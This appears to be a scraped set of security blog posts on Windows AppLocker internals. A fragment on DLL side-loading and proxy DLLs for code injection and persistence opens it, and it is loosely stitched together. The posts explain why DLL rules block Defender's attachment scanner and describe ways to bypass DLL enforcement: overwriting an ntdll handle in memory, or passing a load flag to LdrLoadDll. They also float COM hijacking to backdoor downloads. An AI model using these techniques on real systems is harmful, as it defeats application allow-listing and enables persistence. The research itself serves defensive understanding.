To once more confirm that this happened:

Why this can be fun

DLL side loading exploitation

This approach is a neat and reliable way of creating "proxy" DLLs out of the original ones (that differ by no more than one byte). Then we only might need to proxy one or few functions, instead of worrying about proxying all/most of them.


Introducing injection/persistence of our own code into our favorite program's/service's EXE/DLL.

All with easy creation of the phony DLL (just write in C) and a simple byte replacement in an existing file, no asm required.

The Mysterious Case of a Broken Virus Scanner

By: tiraniddo
6 December 2019 at 03:08
On my VM (with a default Windows 10 1909) I used for my series of AppLocker I wanted to test out the new Edge.  I opened the old Edge and tried to download the canary installer, however the download failed, Edge said the installer had a virus and it'd been deleted. How rude! I also tried the download in Chrome on the same machine with the same result, even ruder!

Downloading Edge Canary in Edge with AppLocker. Shows a bar that the download has been deleted because it's a virus.

Oddly it worked if I turned off DLL Rule Enforcement, but not when I enabled it again. My immediate thought might be the virus checking was trying to map the executable and somehow it was hitting the DLL verification callback and failing as the file was in my Downloads folder which is not in the default rule set. That seemed pretty unlikely, however clearly something was being blocked from running. Fortunately AppLocker maintains an Audit Log under "Applications and Services Logs -> Microsoft -> Windows -> AppLocker -> EXE and DLL" so we can quickly diagnose the failure.

Failing DLL load in audit log showing it tried to load %OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL

The failing DLL load was for "%OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL". This makes sense, the default rules only permit %WINDOWS% and %PROGRAMFILES% for normal users, however %OSDRIVE%\ProgramData is not allowed. This is intentional as you don't want to grant access to locations a normal user could write to, so generally allowing all of %ProgramData% would be asking for trouble. [update:20191206] of course this is known about (I'm not suggesting otherwise), AaronLocker should allow this DLL by default.

I thought it'd at least be interesting to see why it fails and what MPOAV is doing. As the same failure occurred in both Edge (I didn't test IE) and Chrome it was clearly some common API they were calling. As Chrome is open source it made more sense to look there. Tracking down the resource string for the error lead me to this code. The code was using the Attachment Services API. Which is a common interface to verify downloaded files and attachments, apply MOTW and check for viruses.

When the IAttachmentExecute::Save method is called the file is checked for viruses using the currently registered anti-virus COM object which implements the IOfficeAntiVirus interface. The implementation for that COM class is in MPOAV.DLL, which as we saw is blocked so the COM object creation fails. And a failure to create the object causes the Save method to fail and the Attachment Services code to automatically delete the file so the browser can't even do anything about it such as ask the user. Ultra rude!

You might wonder how is this COM class is registered? An implementor needs to register their COM object with a Category ID of "{56FFCC30-D398-11d0-B2AE-00A0C908FA49}". If you have OleViewDotNet setup (note there are other tools) you can dump all registered classes using the following PowerShell command:

Get-ComCategory -CatId '56FFCC30-D398-11d0-B2AE-00A0C908FA49' | Select -ExpandProperty ClassEntries

On a default installation of Windows 10 you should find a single class, "Windows Defender IOfficeAntiVirus implementation" registered which is implemented in the MPOAV DLL. We can try and create the class with DLL enforcement to convince ourselves that's the problem:

PowerShell error when creating MSOAV COM object. Fails with AppLocker policy block error.

No doubt this has been documented before (and I've not looked [update:20191206] of course Hexacorn blogged about it) but you could probably COM hijack this class (or register your own) and get notified of every executable downloaded by the user's web browser. Perhaps even backdoor everything. I've not tested that however ;-)

This issue does demonstrate a common weakness with any application allow-listing solution. You've got to add a rule to allow this (probably undocumented) folder in your DLL rules. Or you could allow-list all Microsoft Defender certificates I suppose. Potentially both of these criteria could change and you end up having to fix random breakage which wouldn't be fun across a large fleet of machines. It also demonstrates a weird issue with attachment scanning, if your AV is somehow misconfigured things will break and there's no obvious reason why. Perhaps we need to move on from using outdated APIs to do this process or at least handle failure better.

The Internals of AppLocker - Part 4 - Blocking DLL Loading

By: tiraniddo
21 November 2019 at 06:42
This is part 4 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 3 here. As I've mentioned before this is how AL works on Windows 10 1909, it might differ on other versions of Windows.

In the first three parts of this series I covered the basics of how AL blocked process creation. We can now tackle another, optional component, blocking DLL loading. If you dig into the Group Policy Editor for Windows you will find a fairly strong warning about enabling DLL rules for AL:

Warning text on DLL rules staying that enabling them could affect system performance.

It seems MS doesn't necessarily recommend enabling DLL blocking rules, but we'll dig in anyway as I can't find any official documentation on how it works and it's always interesting to better understand how something works before relying on it.

We know from the part 1 that there's a policy for DLLs in the DLL.Applocker file. We might as well start with dumping the Security Descriptor from the file using the Format-AppLockerSecurityDescriptor function from part 3, to check it matches our expectations. The DACL is as follows:

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%WINDIR%\*"

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

 - Type  : AllowedCallback
 - Name  : BUILTIN\Administrators
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "*"

 - Type  : Allowed
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

 - Type  : Allowed
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

Nothing shocking here, just our rules written out in a security descriptor. However it gives us a hint that perhaps some of the enforcement is being done inside the kernel driver. Unsurprisingly if you look at the names in APPID you'll find a function called SrpVerifyDll. There's a good chance that's our target to investigate.

By chasing references you'll find the SrpVerifyDll function being called via a Device IO control code to an device object exposed by the APPID driver (\Device\SrpDevice). I'll save you the effort of reverse engineering, as it's pretty routine. The control code and input/output structures are as follows:

// 0x225804

    ULONGLONG FileHandle;
    USHORT FileNameLength;

    NTSTATUS VerifyStatus;

Looking at SrpVerifyDll itself there's not much to really note. It's basically very similar to the verification done for process creation I described in detail in part 2 and 3:
  1. An access check token is captured and duplicated. If the token is restricted query for the logon session token instead.
  2. The token is checked whether it can bypass policy by being SANDBOX_INERT or a service.
  3. Security attributes are gathered using AiGetFileAttributes on the passed in file handle.
  4. Security attributes set on token using AiSetTokenAttributes.
  5. Access check performed using policy security descriptor and status result written back to the Device IO Control output.
It makes sense the the security attributes have to be recreated as the access check needs to know the information about the DLL being loaded not the original executable. Even though a file name is passed in the input structure as far as I can tell it's only used for logging purposes.

There is one big difference in step 1 where the token is captured over the one I documented in part 3. In process blocking if the current token was a non-elevated UAC token then the code would query for the full elevated token and use that to do the access check. This means that even if you were creating a process as the non-elevated user the access check was still performed as if you were an administrator. In DLL blocking this step does not take place, which can lead to a weird case of being able to create a process in any location, but not being able to load any DLLs in the same directory with the default policy. I don't know if this is intentional or Microsoft just don't care?

Who calls the Device IO Control to verify the DLL? To save me some effort I just set a breakpoint on SrpVerifyDll in the kernel debugger and then dumped the stack to find out the caller:

Breakpoint 1 hit
fffff803`38cff100 48895c2410      mov qword ptr [rsp+10h],rbx
0: kd> kc
 # Call Site
00 appid!SrpVerifyDll
01 appid!AipDeviceIoControlDispatch
02 nt!IofCallDriver
03 nt!IopSynchronousServiceTail
04 nt!IopXxxControlFile
05 nt!NtDeviceIoControlFile
06 nt!KiSystemServiceCopyEnd
07 ntdll!NtDeviceIoControlFile
08 ADVAPI32!SaferpIsDllAllowed
09 ADVAPI32!SaferiIsDllAllowed
0a ntdll!LdrpMapDllNtFileName
0b ntdll!LdrpMapDllFullPath
0c ntdll!LdrpProcessWork
0d ntdll!LdrpLoadDllInternal
0e ntdll!LdrpLoadDll

Easy, it's being called from the function SaferiIsDllAllowed which is being invoked from LdrLoadDll. This of course makes perfect sense, however it's interesting that NTDLL is calling a function in ADVAPI32, has MS never heard of layering violations? Let's look into LdrpMapDllNtFileName which is the last function in NTLL before the transition to ADVAPI32. The code which calls SaferiIsDllAllowed looks like the following:

NTSTATUS status;

if ((LoadInfo->LoadFlags & 0x100) == 0 
        && LdrpAdvapi32DllHandle) {
  status = LdrpSaferIsDllAllowedRoutine(
        LoadInfo->FileHandle, LoadInfo->FileName);

The call to SaferiIsDllAllowed  is actually made from a global function pointer. This makes sense as NTDLL can't realistically link directly to ADVAPI32. Something must be initializing these values, and that something is LdrpCodeAuthzInitialize. This initialization function is called during the loader initialization process before any non-system code runs in the new process. It first checks some registry keys, mostly importantly whether "\Registry\Machine\System\CurrentControlSet\Control\Srp\GP\DLL" has any sub-keys, and if so it proceeds to load the ADVAPI32 library using LdrLoadDll and query for the exported SaferiIsDllAllowed function. It stores the DLL handle in LdrpAdvapi32DllHandle and the function pointer 'XOR' encrypted in LdrpSaferIsDllAllowedRoutine.

Once SaferiIsDllAllowed is called the status is checked. If it's not STATUS_SUCCESS then the loader backs out and refuses to continue loading the DLL. It's worth reiterating how different this is from WDAC, where the security checks are done inside the kernel image mapping process. You shouldn't be able to even create a mapped image section which isn't allowed by policy when WDAC is enforced. However with AL loading a DLL is just a case of bypassing the check inside a user mode component.

If we look back at the calling code in LdrpMapDllNtFileName we notice there are two conditions which must be met before the check is made, the LoadFlags must not have the flag 0x100 set and LdrpAdvapi32DllHandle must be non-zero.

The most obvious condition to modify is LdrpAdvapi32DllHandle. If you already have code running (say VBA) you could use WriteProcessMemory to modify the memory location of LdrpAdvapi32DllHandle to be 0. Now any calls to LoadLibrary will not get verified and you can load any DLL you like outside of policy. In theory you might also be able to get the load of ADVAPI32 to fail. However unless LdrLoadDll returns STATUS_NOT_FOUND for the DLL load then the error causes the process to fail during initialization. As ADVAPI32 is in the known DLLs I can't see an easy way around this (I tried by renaming the main executable trick from the AMSI bypass).

The other condition, the LoadFlags is more interesting. There still exists a documented LOAD_IGNORE_CODE_AUTHZ_LEVEL flag you can pass to LoadLibraryEx which used to be able to bypass AppLocker DLL verification. However, as with SANDBOX_INERT this in theory was limited to only System and TrustedInstaller with KB2532445, although according to Stefan Kanthak it might not be blocked. That said I can't get this flag to do anything on Windows 10 1909 and tracing through LdrLoadDll it doesn't look like it's ever used. Where does this 0x100 flag come from then? Seems it's set by the LDrpDllCharacteristicsToLoadFlags function at the start of LdrLoadDll. Which looks like the following:

int LdrpDllCharacteristicsToLoadFlags(int DllCharacteristics) {
  int load_flags = 0;
  // ...
  if (DllCharacteristics & 0x1000)
    load_flags |= 0x100;
  return load_flags;

If we pass in 0x1000 as a DllCharacteristics flag (this doesn't seem to work by putting it in the DLL PE headers as far as I can tell) which is the second parameter to LdrLoadDll then the DLL will not be verified against the DLL policy. The DLL Characteristic flag 0x1000 is documented as IMAGE_DLLCHARACTERISTICS_APPCONTAINER but I don't know what API sets this flag in the call to LdrLoadDll. My original guess was LoadPackagedLibrary but that doesn't seem to be the case.

A simple PowerShell script to test this flag is below:
If you run Start-Dll "Path\To\Any.DLL" where the DLL is not in an allowed location you should find it fails. However if you run Start-Dll "Path\To\Any.DLL" 0x1000 you'll find the DLL now loads.

Of course realistically the DLL blocking is really more about bypassing the process blocking by using the DLL loader instead. Without being able to call LdrLoadDll or writing to process memory it won't be easy to bypass the DLL verification (but of course it will not impossible).

This is the last part on AL for a while, I've got to do other things. I might revisit this topic later to discuss AppX support, SmartLocker and some other fun tricks.
